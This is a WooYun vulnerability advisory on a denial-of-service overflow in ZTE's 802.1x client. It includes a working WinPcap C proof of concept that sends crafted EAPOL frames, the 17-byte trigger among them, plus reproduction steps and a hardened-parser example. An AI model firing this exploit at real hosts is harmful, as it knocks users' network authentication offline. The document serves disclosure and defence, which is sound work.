WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
2013-03-11: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly.
2013-06-09: The vendor has chosen to ignore the vulnerability; details are disclosed to the public.
The ZTE 802.1x authentication client performs no validity check on the data it receives. A crafted frame causes a buffer overflow, resulting in a denial-of-service vulnerability.
pdata points to the received data and data_len is its length. When data_len is 17, the third argument passed to sub_40EFD0 becomes 0xFFFFFFFF (-1 as an unsigned 32-bit value, consistent with a length computed by subtracting a header size from data_len without first checking that the frame is at least that long). With the rest of the data constructed accordingly, the bug is triggered in sub_40E340.
PoC code:
```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <tchar.h>
#include <windows.h>   /* Sleep() */
#include <pcap.h>
#pragma comment(lib, "wpcap.lib")

int _tmain(int argc, _TCHAR* argv[])
{
    pcap_t *fp;
    char errbuf[PCAP_ERRBUF_SIZE];
    u_char packet[3000];
    pcap_if_t *alldevs;
    pcap_if_t *d;
    int i = 0;

    /* Enumerate the adapters */
    if (pcap_findalldevs(&alldevs, errbuf) == -1) {
        fprintf(stderr, "Error in pcap_findalldevs: %s\n", errbuf);
        exit(1);
    }
    if (alldevs == NULL) {
        fprintf(stderr, "No adapters found\n");
        exit(1);
    }

    /* Print the list */
    for (d = alldevs; d; d = d->next) {
        printf("%d. %s", ++i, d->name);
        if (d->description)
            printf(" (%s)\n", d->description);
        else
            printf(" (No description available)\n");
    }

    /* Select the adapter: the first one in the list is used here;
       pick the one that faces the target machine */
    if ((fp = pcap_open_live(alldevs->name, // name of the device
                             65536,         // portion of the packet to capture; irrelevant when only sending
                             1,             // promiscuous mode (nonzero means promiscuous)
                             1000,          // read timeout
                             errbuf         // error buffer
                             )) == NULL) {
        fprintf(stderr, "\nUnable to open the adapter. %s is not supported by WinPcap\n", alldevs->name);
        pcap_freealldevs(alldevs);
        return 2;
    }
    pcap_freealldevs(alldevs);

    memset(packet, 0, sizeof(packet));

    /* Destination: the target machine's MAC address */
    packet[0] = 0x00; packet[1] = 0x0C; packet[2] = 0x29;
    packet[3] = 0x0F; packet[4] = 0x63; packet[5] = 0xDD;
    /* Source MAC 02:02:02:02:02:02 */
    packet[6] = 2; packet[7] = 2; packet[8] = 2;
    packet[9] = 2; packet[10] = 2; packet[11] = 2;
    /* Protocol headers: EtherType 0x888e (EAPOL), EAPOL version 1, type 0 (EAP-Packet) */
    packet[12] = 0x88;
    packet[13] = 0x8e;
    packet[14] = 0x01;
    packet[15] = 0x00;
    packet[0x12] = 0x01; // EAP code; the original comment says this byte must be 0x0A
    packet[22] = 0x04;   // EAP type 4 (MD5-Challenge)
    packet[23] = 0x10;   // value-size 16

    /* Send the first frame (100 bytes) */
    if (pcap_sendpacket(fp,     // adapter
                        packet, // buffer with the packet
                        100     // size
                        ) != 0) {
        fprintf(stderr, "\nError sending the packet: %s\n", pcap_geterr(fp));
        pcap_close(fp);
        return 3;
    }
    Sleep(100);
    /* Send the second frame: its length must be exactly 17 bytes to trigger the bug */
    if (pcap_sendpacket(fp,     // adapter
                        packet, // buffer with the packet
                        17      // size
                        ) != 0) {
        fprintf(stderr, "\nError sending the packet: %s\n", pcap_geterr(fp));
        pcap_close(fp);
        return 3;
    }
    pcap_close(fp);
    return 0;
}
```
Open the client program.
Click Connect; the program starts receiving packets.
Run the PoC. The second frame it sends must be exactly 17 bytes long.
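The value the report gives (a 17-byte frame turns into a length of 0xFFFFFFFF) is the signature of an unsigned subtraction performed before any minimum-length check. The following is an added example, not code from the report or from the ZTE client: it assumes the client subtracts the 18 header bytes the PoC lays out (14 Ethernet + 4 EAPOL) from data_len, which reproduces 17 -> 0xFFFFFFFF, and places that vulnerable computation beside a checked parser that validates the EAPOL and EAP length fields against the bytes that actually arrived. The function names, the 18-byte subtraction and the sample frames (the PoC's 100-byte and 17-byte buffers plus a constructed well-formed EAP-Request/MD5-Challenge) are all assumptions made for the example.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Frame layout the PoC relies on: 14-byte Ethernet header followed by a
 * 4-byte EAPOL header (version, type, 16-bit length), so the EAP packet
 * starts at offset 18. That the client computes data_len - 18 is an
 * assumption for this example; it reproduces the reported 17 -> 0xFFFFFFFF. */
#define ETH_HDR_LEN   14
#define EAPOL_HDR_LEN 4
#define EAP_HDR_LEN   4
#define HDRS_LEN      (ETH_HDR_LEN + EAPOL_HDR_LEN)

/* Vulnerable pattern (reconstruction, not ZTE's code): unsigned subtraction
 * with no minimum-length check, so a short frame wraps to a huge length that
 * is then handed to a copy routine. */
uint32_t eap_len_vulnerable(uint32_t data_len)
{
    return data_len - HDRS_LEN;  /* data_len == 17 yields 0xFFFFFFFF */
}

static void explain(const char **why, const char *msg)
{
    if (why) *why = msg;
}

/* Hardened pattern: every length field is checked against the bytes that
 * actually arrived before any of them is used as a copy size.
 * Returns the EAP packet length, or 0 on rejection (reason in *why if given). */
uint32_t eap_len_checked(const uint8_t *pdata, uint32_t data_len, const char **why)
{
    if (data_len < HDRS_LEN + EAP_HDR_LEN) {
        explain(why, "frame shorter than Ethernet + EAPOL + EAP headers");
        return 0;
    }
    if (pdata[12] != 0x88 || pdata[13] != 0x8e) {
        explain(why, "EtherType is not EAPOL (0x888e)");
        return 0;
    }
    if (pdata[15] != 0x00) {
        explain(why, "EAPOL packet type is not EAP-Packet");
        return 0;
    }
    uint32_t eapol_len = ((uint32_t)pdata[16] << 8) | pdata[17];
    if (eapol_len < EAP_HDR_LEN || eapol_len > data_len - HDRS_LEN) {
        explain(why, "EAPOL length field does not fit the frame");
        return 0;
    }
    uint32_t eap_len = ((uint32_t)pdata[20] << 8) | pdata[21];
    if (eap_len < EAP_HDR_LEN || eap_len > eapol_len) {
        explain(why, "EAP length field does not fit the EAPOL body");
        return 0;
    }
    explain(why, "ok");
    return eap_len;
}

/* Constructed sample frames (built inline, not captured traffic). */
static void poc_headers(uint8_t *p, size_t n)
{
    static const uint8_t dst[6] = {0x00, 0x0C, 0x29, 0x0F, 0x63, 0xDD}; /* PoC's target MAC */
    static const uint8_t src[6] = {2, 2, 2, 2, 2, 2};
    memset(p, 0, n);
    memcpy(p, dst, 6);
    memcpy(p + 6, src, 6);
    p[12] = 0x88; p[13] = 0x8e;  /* EAPOL EtherType */
    p[14] = 0x01; p[15] = 0x00;  /* EAPOL v1, EAP-Packet */
}

/* The PoC's buffer (EAP code 1, type 4, value-size 16, both length fields left
 * at 0) submitted with the given data_len: 100 for the first frame, 17 for the trigger. */
uint32_t check_poc_frame(uint32_t data_len, const char **why)
{
    uint8_t f[100];
    poc_headers(f, sizeof f);
    f[18] = 0x01; f[22] = 0x04; f[23] = 0x10;
    return eap_len_checked(f, data_len, why);
}

/* A well-formed EAP-Request/MD5-Challenge: EAP length 22 =
 * 4-byte header + type + value-size + 16-byte challenge; EAPOL length 22. */
uint32_t check_wellformed_frame(const char **why)
{
    uint8_t f[40];
    poc_headers(f, sizeof f);
    f[16] = 0x00; f[17] = 22;    /* EAPOL length */
    f[18] = 0x01; f[19] = 0x01;  /* EAP Request, identifier 1 */
    f[20] = 0x00; f[21] = 22;    /* EAP length */
    f[22] = 0x04; f[23] = 0x10;  /* MD5-Challenge, value-size 16 */
    for (int i = 0; i < 16; i++) f[24 + i] = (uint8_t)(0xA0 + i);  /* constructed challenge bytes */
    return eap_len_checked(f, sizeof f, why);
}

int main(void)
{
    const char *why;
    uint32_t r;
    printf("vulnerable, data_len=17 : 0x%08X\n", eap_len_vulnerable(17));
    r = check_poc_frame(100, &why); printf("checked, PoC 100 bytes  : %u (%s)\n", r, why);
    r = check_poc_frame(17, &why);  printf("checked, PoC 17 bytes   : %u (%s)\n", r, why);
    r = check_wellformed_frame(&why); printf("checked, well-formed    : %u (%s)\n", r, why);
    return 0;
}
```

Note that the checked parser rejects the PoC's 100-byte frame as well as the 17-byte one, because the PoC leaves both length fields at zero; a client that validates those fields never reaches the copy with an attacker-controlled size. The order of the checks matters: data_len is compared against the fixed header size before any subtraction is done on it, which is exactly the check whose absence turns 17 into 0xFFFFFFFF.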
Vendor response: the vendor could not be reached, or actively declined to respond.